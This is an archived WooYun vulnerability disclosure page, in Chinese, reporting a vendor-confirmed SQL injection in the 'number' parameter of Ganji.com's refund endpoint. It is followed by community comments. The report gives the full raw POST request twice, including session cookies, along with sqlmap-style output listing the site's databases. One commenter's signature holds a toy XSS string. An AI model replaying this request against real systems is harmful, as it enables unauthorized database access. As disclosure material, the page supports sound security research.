当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128547

漏洞标题:赶集网主站SQL注射漏洞一枚(数据轻松跑出)

相关厂商:赶集网

漏洞作者: 沦沦

提交时间:2015-07-23 09:18

修复时间:2015-09-06 09:46

公开时间:2015-09-06 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

RT

详细说明:

POST /vip/assure/index.php?source=refund&act=refund HTTP/1.1
Host: www.ganji.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.ganji.com/vip/assure/index.php?source=refund&act=refund
Cookie: td_cookie=255226173; statistics_clientid=me; td_cookie=255190294; __utma=32156897.2080534857.1436508613.1437386074.1437610926.3; __utmz=32156897.1437610926.3.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; ganji_uuid=6278320008831332031972; sscode=CXXaPwCQLZ1dYb9tCXHXpeWH; GanjiUserName=testper1sh; GanjiUserInfo=%7B%22user_id%22%3A498598084%2C%22email%22%3A%2212379183298%40qq.com%22%2C%22username%22%3A%22testper1sh%22%2C%22user_name%22%3A%22testper1sh%22%2C%22nickname%22%3A%22%22%7D; bizs=%5B201%5D; supercookie=AQx4AGx4ZQt0WQNkAwDkMwExZJWuZ2EuAwD5LmqvMwOyAmyyLGOuLGAvBGuxLwH2Zwx%3D; uc_index_last_panel=addLandmark; JY_users=true; ganji_xuuid=a1fcacf5-a5bb-4a69-94a7-42ebe48ec575.1436508763111; GanjiEmail=12379183298%40qq.com; last_name=testper1sh; citydomain=su; lg=1; _gl_tracker=%7B%22ca_source%22%3A%22www.baidu.com%22%2C%22ca_name%22%3A%22-%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22seo_baidu%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A30125600103%7D; __utmb=32156897.48.10.1437610926; __utmc=32156897; _fli_add_f=1; GANJISESSID=9f7cc5e0e1eb58a86105d26863e7fb4e; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_498598084}; NTKF_T2D_CLIENTID=guest585040C7-F11A-6326-C883-136E5C423F93; __utmt=1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
number=11111&create_at=1&abnormal_status=1
number参数没进行过滤

1.png


available databases [5]:
[*] ganji_secondmarket
[*] information_schema
[*] mysql
[*] percona
[*] test

漏洞证明:

POST /vip/assure/index.php?source=refund&act=refund HTTP/1.1
Host: www.ganji.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.ganji.com/vip/assure/index.php?source=refund&act=refund
Cookie: td_cookie=255226173; statistics_clientid=me; td_cookie=255190294; __utma=32156897.2080534857.1436508613.1437386074.1437610926.3; __utmz=32156897.1437610926.3.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; ganji_uuid=6278320008831332031972; sscode=CXXaPwCQLZ1dYb9tCXHXpeWH; GanjiUserName=testper1sh; GanjiUserInfo=%7B%22user_id%22%3A498598084%2C%22email%22%3A%2212379183298%40qq.com%22%2C%22username%22%3A%22testper1sh%22%2C%22user_name%22%3A%22testper1sh%22%2C%22nickname%22%3A%22%22%7D; bizs=%5B201%5D; supercookie=AQx4AGx4ZQt0WQNkAwDkMwExZJWuZ2EuAwD5LmqvMwOyAmyyLGOuLGAvBGuxLwH2Zwx%3D; uc_index_last_panel=addLandmark; JY_users=true; ganji_xuuid=a1fcacf5-a5bb-4a69-94a7-42ebe48ec575.1436508763111; GanjiEmail=12379183298%40qq.com; last_name=testper1sh; citydomain=su; lg=1; _gl_tracker=%7B%22ca_source%22%3A%22www.baidu.com%22%2C%22ca_name%22%3A%22-%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22seo_baidu%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A30125600103%7D; __utmb=32156897.48.10.1437610926; __utmc=32156897; _fli_add_f=1; GANJISESSID=9f7cc5e0e1eb58a86105d26863e7fb4e; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_498598084}; NTKF_T2D_CLIENTID=guest585040C7-F11A-6326-C883-136E5C423F93; __utmt=1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
number=11111&create_at=1&abnormal_status=1
number参数没进行过滤

1.png


available databases [5]:
[*] ganji_secondmarket
[*] information_schema
[*] mysql
[*] percona
[*] test

修复方案:

过滤,能送个礼物吗

版权声明:转载请注明来源 沦沦@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-23 09:44

厂商回复:

我们穷,给你个高rank,拿wb找剑心要礼物吧

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-23 09:19 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    主站!

  2. 2015-07-23 09:19 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    1楼

  3. 2015-07-23 09:20 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    主站,屌屌的。

  4. 2015-07-23 09:23 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    主站,屌屌的。

  5. 2015-07-23 09:27 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    主站,屌屌的。大哥吃的啥药,卖我点。

  6. 2015-07-23 09:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    你这么叼,小心x牛k你!

  7. 2015-07-23 09:30 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    @px1624 已吓跑

  8. 2015-07-23 09:33 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    ヾ(。`Д´。)?

  9. 2015-07-23 09:38 | 有归于无 ( 实习白帽子 | Rank:84 漏洞数:15 | 有归于无)

    主站!

  10. 2015-07-23 09:46 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    牛X

  11. 2015-07-23 09:48 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    你这么屌,小心我k你

  12. 2015-07-23 09:49 | 路人甲 ( 实习白帽子 | Rank:31 漏洞数:4 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    你这么屌,小心我k你

  13. 2015-07-23 09:50 | 剑心 ( 实习白帽子 | Rank:37 漏洞数:9 | xsser)

    你这么屌,小心我k你

  14. 2015-07-23 09:59 | 在这光滑的地上摩擦 ( 路人 | Rank:6 漏洞数:1 | 大家好 我是约瑟逊 庞麦郎)

    你这么屌,小心我k你

  15. 2015-07-23 10:05 | 汽车之家(乌云厂商)

    hi,伦伦^.^

  16. 2015-07-23 10:08 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    伦伦,这么屌,下次见了请我吃饭啊!

  17. 2015-07-23 10:09 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    @紫霞仙子 好的

  18. 2015-07-23 10:10 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    伦伦,这么屌,下次见了请我吃饭啊!

  19. 2015-07-23 13:31 | xss_art ( 路人 | Rank:11 漏洞数:3 | 只会弹框框的跨站师。。。。)

    关注。。。

  20. 2015-07-25 18:54 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    伦伦,这么屌,下次见了请我吃饭啊!

  21. 2015-07-25 20:18 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    @M4sk 哈哈,过来玩呀

  22. 2015-09-06 09:56 | 土夫子 ( 普通白帽子 | Rank:173 漏洞数:41 | 逆流而上,顺势而为)

    我们穷,给你个高rank,拿wb找剑心要礼物吧

  23. 2015-09-06 10:25 | 坏男孩-A_A ( 路人 | Rank:2 漏洞数:1 | 菜鸟一枚)

    我们穷,给你个高rank,拿wb找剑心要礼物吧

  24. 2015-09-06 11:26 | 路人毛 ( 路人 | Rank:23 漏洞数:10 | 昨晚做梦,挖到了电信都漏洞,被电信起诉了...)

    @剑心 厂商坑你!哈哈哈

  25. 2015-09-07 13:47 | 辛巴 ( 普通白帽子 | Rank:231 漏洞数:83 | 现实中的无能为力,不代表网络中也要低声下...)

    我们穷,给你个高rank,拿wb找剑心要礼物吧

  26. 2015-09-12 17:10 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    我们穷,给你个高rank,拿wb找剑心要礼物吧